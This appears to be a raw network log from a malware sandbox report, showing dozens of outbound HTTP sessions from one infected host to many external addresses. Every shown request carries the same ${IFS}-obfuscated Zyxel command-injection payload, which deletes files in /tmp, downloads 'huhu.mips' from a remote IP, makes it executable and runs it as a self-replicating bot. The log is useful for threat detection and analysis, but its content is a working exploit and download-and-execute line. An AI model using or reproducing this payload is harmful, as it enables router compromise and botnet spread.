                                                Jan 29, 2024 07:07:15.883433104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                331192.168.2.2341682173.110.17.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:15.883456945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                332192.168.2.2334550172.108.114.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:15.883511066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                333192.168.2.2351652117.4.8.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:15.883531094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                334192.168.2.2337448145.225.158.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:15.883594990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                335192.168.2.2343148143.112.202.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:15.883603096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                336192.168.2.2336570124.205.241.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:15.883714914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                337192.168.2.2335928168.130.253.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:15.883781910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                338192.168.2.234230469.179.237.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:15.883814096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                339192.168.2.2350962139.28.163.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:16.895930052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                340192.168.2.2339766142.107.164.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:16.896006107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                341192.168.2.234967858.127.14.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:16.896006107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                342192.168.2.2333400114.189.51.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:16.896045923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                343192.168.2.2342086110.93.43.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:16.896066904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                344192.168.2.2349094114.142.163.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:16.896099091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                345192.168.2.235547039.6.199.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:16.896155119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                346192.168.2.235464251.216.201.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:16.896214008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                347192.168.2.233278470.200.197.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:16.896294117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                348192.168.2.2337078172.193.188.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:17.902101994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                349192.168.2.2336018116.4.147.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:17.902139902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                350192.168.2.2337264160.59.2.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:18.908965111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                351192.168.2.2357048203.115.94.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:18.909017086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                352192.168.2.2336398193.110.3.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:18.909037113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                353192.168.2.234197059.34.157.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:18.909075975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                354192.168.2.2355676117.59.118.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:18.909111023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                355192.168.2.234435258.166.123.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:18.909148932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                356192.168.2.2337686147.201.53.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:18.909209013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                357192.168.2.2343966159.254.199.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:19.912921906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                358192.168.2.234351635.154.34.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:19.912955046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                359192.168.2.235114693.33.138.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:19.912976980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                360192.168.2.235529292.63.86.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:19.913022041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                361192.168.2.235515219.220.31.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:20.915770054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                362192.168.2.2356036185.239.10.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:20.915803909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                363192.168.2.2342052169.119.251.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:20.915848970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                364192.168.2.2352264156.0.113.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:20.915870905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                365192.168.2.235147463.7.42.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:20.915915966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                366192.168.2.2358070181.1.110.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:20.916076899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                367192.168.2.236076696.107.253.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:20.916156054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                368192.168.2.235931441.180.78.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:20.916165113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                369192.168.2.235329862.24.219.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:20.916224003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                370192.168.2.2342694144.116.30.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:20.916233063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                371192.168.2.2353146105.158.69.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:20.916246891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                372192.168.2.2343156159.212.118.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:20.916336060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                373192.168.2.235679280.223.93.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:21.919718981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                374192.168.2.235697662.38.83.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:21.919744968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                375192.168.2.2344182123.161.169.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:21.919784069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                376192.168.2.235204871.37.19.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:21.919826031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                377192.168.2.2349374202.246.245.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:21.919848919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                378192.168.2.2335676193.136.190.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:21.919903994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                379192.168.2.2347328197.6.184.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:21.919945955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                380192.168.2.2332956130.99.48.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:21.919962883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                381192.168.2.234072219.218.181.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:21.920001030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                382192.168.2.234429464.129.91.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:21.920036077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                383192.168.2.2335880162.160.216.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:21.920074940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                384192.168.2.235487242.23.246.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:21.920269012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                385192.168.2.2352446186.87.178.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:22.923898935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                386192.168.2.235543891.61.98.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:22.923991919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                387192.168.2.233433681.78.152.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:22.924026012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                388192.168.2.235611085.160.237.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:22.924072981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                389192.168.2.234638680.124.41.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:22.924139023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                390192.168.2.235316054.223.13.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:22.924174070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                391192.168.2.233789085.4.170.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:22.924211979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                392192.168.2.2349108171.114.49.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:22.924258947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                393192.168.2.2339936112.62.224.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:22.924438000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                394192.168.2.2341794117.34.141.2443
                                                TimestampBytes transferredDirectionData
